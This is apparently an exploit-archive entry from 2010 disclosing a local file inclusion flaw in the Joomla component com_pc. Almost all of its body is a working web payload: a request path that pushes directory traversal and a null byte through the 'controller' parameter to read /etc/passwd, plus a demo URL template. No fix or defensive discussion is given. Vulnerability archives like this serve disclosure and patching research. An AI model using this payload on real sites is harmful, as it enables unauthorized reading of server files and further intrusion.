id: 10688
date: 01/17/2010
title: Joomla Component com_pc LFI Vulnerability
author: Pyske
cves: 

=========================================
Joomla Component com_pc LFI Vulnerability
=========================================

<------------------- header data start ------------------- >
 
#############################################################
# Joomla Component com_pc LFI Vulnerability
#############################################################
 
# Author : Pyske
 
 
# Name : com_pc

# Bug Type : Local File Inlusion
 
 
 
# Demo Vuln. : http://server/index.php?option=com_pc&controller= [LFI]
 
 
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path /index.php?option=com_pc&controller=index.php?option=com_pc&controller=../../../../../../../etc/passwd%00
 
< -- bug code end of -- >



#  0day.today [2023-03-21]  #